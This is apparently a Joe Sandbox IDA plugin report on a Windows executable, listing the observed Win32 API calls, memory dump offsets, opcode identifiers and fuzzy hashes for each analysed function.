                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
                                                                  • String ID: %s.dll
                                                                  • API String ID: 4178508759-3668843792
                                                                  • Opcode ID: 85535ec0e5e890c2202cf6ef6c4d9fe4ba616bd64fcc6351fedbe745838c2431
                                                                  • Instruction ID: aeac6e575d03eafd3f6c487df0eb32fa97cf7b4fa9cce637b04c964ddecc85eb
                                                                  • Opcode Fuzzy Hash: 85535ec0e5e890c2202cf6ef6c4d9fe4ba616bd64fcc6351fedbe745838c2431
                                                                  • Instruction Fuzzy Hash: E101DD72F001189BCF15DBA5EC859DF77BCFB4C344F4408BEA606E3140DAB95A458B55
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: FreeTask$ClearH_prologVariant
                                                                  • String ID:
                                                                  • API String ID: 82050969-0
                                                                  • Opcode ID: aa54fe472d68a3241bf7ad01d18b909729e7cebb57c0b9826251c15e0844cbce
                                                                  • Instruction ID: aff64e16e21245f6878e9bb53209405c6384404d08c4ae572c20ba40f5270c01
                                                                  • Opcode Fuzzy Hash: aa54fe472d68a3241bf7ad01d18b909729e7cebb57c0b9826251c15e0844cbce
                                                                  • Instruction Fuzzy Hash: 1371F271A00602DFCB20DFA5C98486AB3B6FF48308754097EE556E76A1CB39AC41CB58
                                                                  APIs
                                                                  • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 021F21F9
                                                                  • SetLastError.KERNEL32(0000007E), ref: 021F223B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113850461.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21f1000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHugeLastRead
                                                                  • String ID:
                                                                  • API String ID: 3239643929-0
                                                                  • Opcode ID: ff59f180f2ff5cb673f7b2b59e0467fe8b0b4757ef12f2a658b9fe6ad8965073
                                                                  • Instruction ID: ed2ad3fd605c8234a36f3e1cf64749aa27c312f71796c8891f58c6c121c656e3
                                                                  • Opcode Fuzzy Hash: ff59f180f2ff5cb673f7b2b59e0467fe8b0b4757ef12f2a658b9fe6ad8965073
                                                                  • Instruction Fuzzy Hash: 8481BBB4A40209DFDB44DF94C894BAEB7B1FF48314F158198E929AB355C734EA81CF91
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 00419D81
                                                                  • GetLastError.KERNEL32(?,?,?), ref: 00419D8B
                                                                  • ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 00419E54
                                                                  • GetLastError.KERNEL32(?,?,?), ref: 00419E5E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastRead
                                                                  • String ID:
                                                                  • API String ID: 1948546556-0
                                                                  • Opcode ID: 5231f9cba8860c89ca05e19dafb1a2c24a41461642442fb6cf506ca3b38b4cc7
                                                                  • Instruction ID: b56e1250b5eeb3e03af337cf5b8aade3a6d5dc35aadc41e3464ab86f92864a86
                                                                  • Opcode Fuzzy Hash: 5231f9cba8860c89ca05e19dafb1a2c24a41461642442fb6cf506ca3b38b4cc7
                                                                  • Instruction Fuzzy Hash: B26191706043859FDF21CF58C894BEA7BE4AF11304F1845ABE8518B2D1D378DD95CB5A
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 0040BAF0
                                                                  • GetDesktopWindow.USER32 ref: 0040BB03
                                                                  • GetWindowRect.USER32(?,?), ref: 0040BB16
                                                                  • GetWindowRect.USER32(?,?), ref: 0040BB23
                                                                    • Part of subcall function 00423D5B: MoveWindow.USER32(?,?,?,00000000,?,00000000,?,0040BC64,?,?), ref: 00423D76
                                                                    • Part of subcall function 00423D99: ShowWindow.USER32(?,?,0040BC6D,00000000,?,?), ref: 00423DA6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$DesktopMoveShowVisible
                                                                  • String ID:
                                                                  • API String ID: 3835705305-0
                                                                  • Opcode ID: 02730a8dcdf5586f36da1b8026ee27db7f50392f629d12665f502e7a90036cb3
                                                                  • Instruction ID: 0b392027358f973cf9a87025e36c0637855173732e828471bea61ad1e95020aa
                                                                  • Opcode Fuzzy Hash: 02730a8dcdf5586f36da1b8026ee27db7f50392f629d12665f502e7a90036cb3
                                                                  • Instruction Fuzzy Hash: 51510C75A0020AEFDB00DFA9D998CAEB7B9EF48705B14446DF501E7254CB39EE01CB64
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: _strcspn_strlen_strncpy_strpbrk
                                                                  • String ID:
                                                                  • API String ID: 635841138-0
                                                                  • Opcode ID: 4acd2b3da59a346ea89797bb7e0e1b5f04a14f124cc7c14e013e1c037170ab40
                                                                  • Instruction ID: 44dc5c145c95b46dcc10438fb611d3ac7f676edd126e77a362cf6d6368d72d10
                                                                  • Opcode Fuzzy Hash: 4acd2b3da59a346ea89797bb7e0e1b5f04a14f124cc7c14e013e1c037170ab40
                                                                  • Instruction Fuzzy Hash: 90510B76D0421AAADF21DBA59C816FF77A8AB44348F26042FD511A3243E77CCDC1C799
                                                                  APIs
                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001), ref: 0041700F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: 96b8e6bb5318c80f56763d940f7dc6e0f4e8b6228f9512b9e20a3a71bbbea6aa
                                                                  • Instruction ID: 6123c53501c71611ec199f00bb1904ad0936d21d6721be59c225a486e99e16bd
                                                                  • Opcode Fuzzy Hash: 96b8e6bb5318c80f56763d940f7dc6e0f4e8b6228f9512b9e20a3a71bbbea6aa
                                                                  • Instruction Fuzzy Hash: F2514E71904348DFDB32CFA9D880AEDBBB8FF49304F21416AE855AB252D7349A81CF15
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: GlobalLocklstrlen
                                                                  • String ID:
                                                                  • API String ID: 1144527523-0
                                                                  • Opcode ID: 8169b16f82f0868695eb299ef13228d82f00ca6112b92c9d85447b5b163038f3
                                                                  • Instruction ID: 40d86c0513ae9d415dd9e2a43e2b1b87c3bf4c07422c7a4737d8b13f56130937
                                                                  • Opcode Fuzzy Hash: 8169b16f82f0868695eb299ef13228d82f00ca6112b92c9d85447b5b163038f3
                                                                  • Instruction Fuzzy Hash: 5B41D772A00619EFCB14DFB5D88589EBB78FF04314B50823AE416D7295D7389986CF94
                                                                  APIs
                                                                  • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0042426A
                                                                  • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 004242CF
                                                                  • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00424314
                                                                  • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 0042433D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 578cd5156323f8e4839ee2b7b2deaaf76e5d6958570f61373f7fb0b6f96745cb
                                                                  • Instruction ID: 97a3aa0f2093d80d9ab1d2ca581497d8a10018e442b15fa7111c8de2717619ad
                                                                  • Opcode Fuzzy Hash: 578cd5156323f8e4839ee2b7b2deaaf76e5d6958570f61373f7fb0b6f96745cb
                                                                  • Instruction Fuzzy Hash: D2319230701128EBCB25DF56D880EAF7BA9EF81390F90406BF9059B251DA38DD81DBE4
                                                                  APIs
                                                                  • lstrcpynA.KERNEL32(?,?,00000104), ref: 00424E11
                                                                  • GetFileTime.KERNEL32(?,?,?,?), ref: 00424E33
                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 00424E41
                                                                  • GetFileAttributesA.KERNEL32(?), ref: 00424E6B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesSizeTimelstrcpyn
                                                                  • String ID:
                                                                  • API String ID: 1499663573-0
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: FreeString$ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 3349467263-0
                                                                  APIs
                                                                    • Part of subcall function 0040E573: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040E58D
                                                                    • Part of subcall function 0040E573: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0040E59E
                                                                    • Part of subcall function 0040E573: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0040E5E4
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AEAB
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,?,00000000,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AEC8
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,?,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AF3E
                                                                  • CompareStringW.KERNEL32(?,?,00000190,00000000,?,00000000,?,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 0041AF54
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$QueryVirtual$CompareInfoStringSystem
                                                                  • String ID:
                                                                  • API String ID: 1997773198-0
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: _strlen$___initmbctable_strcat
                                                                  • String ID:
                                                                  • API String ID: 109824703-0
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: CreateH_prologIndirectRect
                                                                  • String ID:
                                                                  • API String ID: 2123978231-0
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: ArrayDestroyFreeSafeTask
                                                                  • String ID:
                                                                  • API String ID: 3253174383-0
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: Rect$EqualH_prologIntersect
                                                                  • String ID:
                                                                  • API String ID: 2227276553-0
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,00000000,00000005), ref: 004202B2
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004202BA
                                                                  • LockResource.KERNEL32(00000000), ref: 004202CC
                                                                  • FreeResource.KERNEL32(00000000), ref: 00420316
                                                                  Similarity
                                                                  • API ID: Resource$FindFreeLoadLock
                                                                  • String ID:
                                                                  • API String ID: 1078018258-0
                                                                  APIs
                                                                  • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004231AB
                                                                  • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004231CD
                                                                  • GetCapture.USER32 ref: 004231DF
                                                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004231EE
                                                                  Similarity
                                                                  • API ID: MessageSend$Capture
                                                                  • String ID:
                                                                  • API String ID: 1665607226-0
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 004249F9
                                                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 004249FF
                                                                  • DuplicateHandle.KERNEL32(00000000), ref: 00424A02
                                                                  • GetLastError.KERNEL32(?), ref: 00424A1D
                                                                  Similarity
                                                                  • API ID: CurrentProcess$DuplicateErrorHandleLast
                                                                  • String ID:
                                                                  • API String ID: 3907606552-0
                                                                  APIs
                                                                  • htonl.WS2_32(00000000), ref: 0042C075
                                                                  • htons.WS2_32(?), ref: 0042C081
                                                                    • Part of subcall function 0040422C: bind.WS2_32(?,00000002,00000002), ref: 00404237
                                                                  • inet_addr.WS2_32(?), ref: 0042C0B3
                                                                  • WSASetLastError.WS2_32(00002726), ref: 0042C0C3
                                                                  Similarity
                                                                  • API ID: ErrorLastbindhtonlhtonsinet_addr
                                                                  • String ID:
                                                                  • API String ID: 3045141626-0
                                                                  APIs
                                                                  • GetTopWindow.USER32(?), ref: 00422626
                                                                  • GetTopWindow.USER32(00000000), ref: 00422665
                                                                  • GetWindow.USER32(00000000,00000002), ref: 00422683
                                                                  Similarity
                                                                  • API ID: Window
                                                                  • String ID:
                                                                  • API String ID: 2353593579-0
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,?), ref: 00422077
                                                                  • GetTopWindow.USER32(00000000), ref: 0042208A
                                                                    • Part of subcall function 0042206C: GetWindow.USER32(00000000,00000002), ref: 004220D1
                                                                  • GetTopWindow.USER32(?), ref: 004220BA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item
                                                                  • String ID:
                                                                  • API String ID: 369458955-0
                                                                  APIs
                                                                  • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0042760A
                                                                  • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00427613
                                                                  • wsprintfA.USER32 ref: 0042762F
                                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00427645
                                                                  Similarity
                                                                  • API ID: ClosePrivateProfileStringValueWritewsprintf
                                                                  • String ID:
                                                                  • API String ID: 1902064621-0
                                                                  APIs
                                                                  • SysStringLen.OLEAUT32(?), ref: 0042A079
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,0042B1A4,00000000), ref: 0042A08F
                                                                  • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 0042A097
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,?,0042B1A4,00000000), ref: 0042A0AC
                                                                  Similarity
                                                                  • API ID: Byte$CharMultiStringWide$Alloc
                                                                  • String ID:
                                                                  • API String ID: 3384502665-0
                                                                  APIs
                                                                  • IntersectRect.USER32(?,00000000,?), ref: 00409539
                                                                  • EqualRect.USER32(?,00000000), ref: 00409546
                                                                  • IsRectEmpty.USER32(?), ref: 00409550
                                                                  • InvalidateRect.USER32(?,?,?), ref: 0040956D
                                                                  Similarity
                                                                  • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                  • String ID:
                                                                  • API String ID: 3354205298-0
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,?,000000F0), ref: 004239FD
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,?,?,00420245,?,?,00403D00,?,?,?,?,?,0042CC28), ref: 00423A09
                                                                  • LockResource.KERNEL32(00000000,?,?,?,?,00420245,?,?,00403D00,?,?,?,?,?,0042CC28,000000FF), ref: 00423A16
                                                                  • FreeResource.KERNEL32(00000000,?,?,?,?,00420245,?,?,00403D00,?,?,?,?,?,0042CC28,000000FF), ref: 00423A31
                                                                  Similarity
                                                                  • API ID: Resource$FindFreeLoadLock
                                                                  • String ID:
                                                                  • API String ID: 1078018258-0
                                                                  APIs
                                                                  • EnableMenuItem.USER32(?,?,?), ref: 0041FC98
                                                                  • GetFocus.USER32 ref: 0041FCAB
                                                                  • GetParent.USER32(?), ref: 0041FCB9
                                                                  • SendMessageA.USER32(?,00000028,00000000,00000000), ref: 0041FCCE
                                                                  Similarity
                                                                  • API ID: EnableFocusItemMenuMessageParentSend
                                                                  • String ID:
                                                                  • API String ID: 2297321873-0
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: H_prologTextWindowlstrcpynlstrlen
                                                                  • String ID:
                                                                  • API String ID: 3022380644-0
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: ___addl
                                                                  • String ID:
                                                                  • API String ID: 2260456530-0
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?), ref: 004265D2
                                                                  • GetWindowTextA.USER32(?,?,00000100), ref: 004265EE
                                                                  • lstrcmpA.KERNEL32(?,?), ref: 00426602
                                                                  • SetWindowTextA.USER32(?,?), ref: 00426612
                                                                  Similarity
                                                                  • API ID: TextWindow$lstrcmplstrlen
                                                                  • String ID:
                                                                  • API String ID: 330964273-0
                                                                  APIs
                                                                  • EnableWindow.USER32(00000000,00000001), ref: 0042069E
                                                                  • GetActiveWindow.USER32 ref: 004206A9
                                                                  • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004206B7
                                                                  • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004206D3
                                                                  Similarity
                                                                  • API ID: Window$Active$EnableFreeResource
                                                                  • String ID:
                                                                  • API String ID: 3751187028-0
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 0042A404
                                                                  • GetTickCount.KERNEL32 ref: 0042A411
                                                                  • CoFreeUnusedLibraries.OLE32 ref: 0042A420
                                                                  • GetTickCount.KERNEL32 ref: 0042A426
                                                                    • Part of subcall function 0042A38B: CoFreeUnusedLibraries.OLE32(00000000,0042A46B,00000000,?,?,00409F1F), ref: 0042A3CF
                                                                    • Part of subcall function 0042A38B: OleUninitialize.OLE32(?,?,00409F1F), ref: 0042A3D5
                                                                  Similarity
                                                                  • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                  • String ID:
                                                                  • API String ID: 685759847-0
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(?,?,00000000,00000000), ref: 0040FCD9
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Info
                                                                  • String ID: @D$@D
                                                                  • API String ID: 1807457897-1398737213
                                                                  • Opcode ID: 91e4028214e053c96e7723c0768ed27d2ed356ddb9a79d95c398ad60e743bbb3
                                                                  • Instruction ID: 62482ca91026c37aa1dac497eb650ef51dc4ea81e72a355b0f7e427c1810b87f
                                                                  • Opcode Fuzzy Hash: 91e4028214e053c96e7723c0768ed27d2ed356ddb9a79d95c398ad60e743bbb3
                                                                  • Instruction Fuzzy Hash: 404139749041519FE720CFB4D48167A7BA1AF49304F28447FD68AEB7A2D23D581E8B8D
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Info
                                                                  • String ID: $
                                                                  • API String ID: 1807457897-3032137957
                                                                  • Opcode ID: a6edd212cb7947d5841bf6e2cae9edd82bd8bb28a2de40edc7fc4ba90436b0ee
                                                                  • Instruction ID: e3cc246aaaae655b62ba72c07eeb59b114e224ef0f58dc480b4ed99257abb5d6
                                                                  • Opcode Fuzzy Hash: a6edd212cb7947d5841bf6e2cae9edd82bd8bb28a2de40edc7fc4ba90436b0ee
                                                                  • Instruction Fuzzy Hash: 4441CD7150425C5EEB218764DC5ABFB3BE8EB06304F2408F2DA44E7192C27819ADDB9C
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: __shift_strcat_strlen
                                                                  • String ID: e+000
                                                                  • API String ID: 208078240-1027065040
                                                                  • Opcode ID: 194d25e77a56b344b629a956c0d25f441e46d8e36f353af7accf61324439c85b
                                                                  • Instruction ID: 89f468d84c82e1ace85985d2492e42cf5a36f8a17d3e9c42b5c9dfd052896992
                                                                  • Opcode Fuzzy Hash: 194d25e77a56b344b629a956c0d25f441e46d8e36f353af7accf61324439c85b
                                                                  • Instruction Fuzzy Hash: 2221C0722093904FD72A9E38DC947E63BD45B03318F1944BFE485CA2D2D67DC885C759
                                                                  APIs
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,021313E0,00000000,00000007,00000007,^@,004176A0,00000000), ref: 0041A003
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 0041A026
                                                                    • Part of subcall function 0040E502: __lock.LIBCMT ref: 0040E520
                                                                    • Part of subcall function 0040E502: HeapFree.KERNEL32(00000000,?,00431A60,0000000C,004108CC,00000000,00431B30,00000008,00410901,?,?,?,00410723,00000004,00431B20,00000010), ref: 0040E567
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$FreeHeap__lock
                                                                  • String ID: ^@
                                                                  • API String ID: 38926842-3067454934
                                                                  • Opcode ID: 2318afb57be2129960d38f3a2b4ee928f934c80d6b1bab9723fc74fbe9b91bfe
                                                                  • Instruction ID: 184d1faa913d037cc4e56e763f0fd7e80dd229126f78ea24d8bc9510c4970353
                                                                  • Opcode Fuzzy Hash: 2318afb57be2129960d38f3a2b4ee928f934c80d6b1bab9723fc74fbe9b91bfe
